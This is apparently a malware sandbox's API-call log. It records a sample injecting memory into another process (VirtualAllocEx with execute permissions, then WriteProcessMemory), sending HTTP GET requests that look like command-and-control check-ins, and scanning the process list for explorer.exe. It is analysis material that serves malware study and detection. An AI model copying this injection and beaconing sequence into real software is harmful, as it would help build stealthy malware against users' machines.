	[0226.255] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x150000, lpBuffer=0x1280b8*, nSize=0x400, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x1280b8*, lpNumberOfBytesWritten=0x12802c*=0x400) returned 1
	[0226.256] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x1a0000
	[0226.256] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1a0000, lpBuffer=0x1284b8*, nSize=0x80, lpNumberOfBytesWritten=0x12802c | out: lpBuffer=0x1284b8*, lpNumberOfBytesWritten=0x12802c*=0x80) returned 1
	[0226.256] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x1b0000
	[0226.256] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x127fac, nSize=0x70, lpNumberOfBytesRead=0x127f8c | out: lpBuffer=0x127fac*, lpNumberOfBytesRead=0x127f8c*=0x70) returned 1
	[0226.256] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6260
	[0226.256] VirtualAllocEx (hProcess=0x62c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x1c0000
	[0226.257] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1c0000, lpBuffer=0x22a6260*, nSize=0x2c, lpNumberOfBytesWritten=0x127f84 | out: lpBuffer=0x22a6260*, lpNumberOfBytesWritten=0x127f84*=0x2c) returned 1
	[0226.257] WriteProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x127fac*, nSize=0x70, lpNumberOfBytesWritten=0x127f84 | out: lpBuffer=0x127fac*, lpNumberOfBytesWritten=0x127f84*=0x70) returned 1
	[0226.257] ResetEvent (hEvent=0x5d4) returned 1
	[0226.257] SignalObjectAndWait (hObjectToSignal=0x56c, hObjectToWaitOn=0x5d4, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0226.277] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x60000, lpBuffer=0x127fac, nSize=0x70, lpNumberOfBytesRead=0x127f84 | out: lpBuffer=0x127fac*, lpNumberOfBytesRead=0x127f84*=0x70) returned 1
	[0226.494] VirtualFreeEx (hProcess=0x62c, lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.494] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6260) returned 1
	[0226.494] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1a0000, lpBuffer=0x1284b8, nSize=0x80, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x1284b8*, lpNumberOfBytesRead=0x128040*=0x80) returned 1
	[0226.494] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x150000, lpBuffer=0x1280b8, nSize=0x400, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x1280b8*, lpNumberOfBytesRead=0x128040*=0x400) returned 1
	[0226.494] ReadProcessMemory (in: hProcess=0x62c, lpBaseAddress=0x1b0004, lpBuffer=0x12806c, nSize=0x4, lpNumberOfBytesRead=0x128040 | out: lpBuffer=0x12806c*, lpNumberOfBytesRead=0x128040*=0x4) returned 1
	[0226.494] VirtualFreeEx (hProcess=0x62c, lpAddress=0x1b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] VirtualFreeEx (hProcess=0x62c, lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] VirtualFreeEx (hProcess=0x62c, lpAddress=0x140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] VirtualFreeEx (hProcess=0x62c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231efe8) returned 1
	[0226.495] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0226.495] VirtualFreeEx (hProcess=0x62c, lpAddress=0x130000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] VirtualFreeEx (hProcess=0x62c, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0226.495] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737b88) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff510) returned 1
	[0226.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0226.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffcf0
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff858) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff900) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffa8) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fff90) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdf8) returned 1
	[0226.496] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6618) returned 1
	[0226.496] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x40) returned 0x22c7308
	[0226.496] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0226.496] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0226.496] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/10/62/68975886/1/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0226.496] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128be4, dwBufferLength=0x4) returned 1
	[0226.496] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0226.860] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0226.860] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bd4, lpdwBufferLength=0x128bd0, lpdwIndex=0x0 | out: lpBuffer=0x128bd4*, lpdwBufferLength=0x128bd0*=0x4, lpdwIndex=0x0) returned 1
	[0226.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1
	[0226.861] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff9a8
	[0226.861] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x242550, cbMultiByte=-1, lpWideCharStr=0x22ff9a8, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0226.861] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0226.861] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0226.861] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/63/psfin/start///", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0226.861] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128bbc, dwBufferLength=0x4) returned 1
	[0226.861] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0227.193] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0227.193] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128bac, lpdwBufferLength=0x128ba8, lpdwIndex=0x0 | out: lpBuffer=0x128bac*, lpdwBufferLength=0x128ba8*=0x4, lpdwIndex=0x0) returned 1
	[0227.193] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff9a8) returned 1
	[0227.193] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x610
	[0227.197] Process32FirstW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0227.199] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0227.199] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0227.201] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0227.201] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0227.203] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0227.203] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.205] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0227.205] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0227.207] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0227.207] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0227.208] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0227.208] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0227.210] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0227.210] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0227.210] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0227.210] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0227.211] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0227.211] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0227.212] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0227.212] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.213] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.213] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.214] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.214] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.215] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.215] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.216] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.216] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.217] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.217] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.218] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.218] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.219] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.219] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0227.220] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0227.220] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.221] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.221] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0227.222] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0227.222] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.222] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0227.222] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.223] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0227.223] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0227.224] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0227.224] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0227.225] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0227.225] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0227.226] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0227.226] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0227.227] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0227.227] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0227.228] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0227.228] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0227.229] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0227.229] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0227.230] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0227.230] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0227.234] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0227.234] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0227.235] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0227.235] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0227.236] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0227.236] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0227.236] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0227.236] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0227.237] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0227.237] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0227.238] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0227.238] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0227.239] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0227.239] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0227.240] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0227.240] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0227.241] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0227.241] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0227.242] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0227.242] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0227.243] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0227.243] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0227.244] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0227.244] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0227.245] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0227.245] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.246] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0227.246] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0227.247] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0227.247] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0227.248] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0227.248] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0227.248] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0227.248] Process32NextW (in: hSnapshot=0x610, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0227.249] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
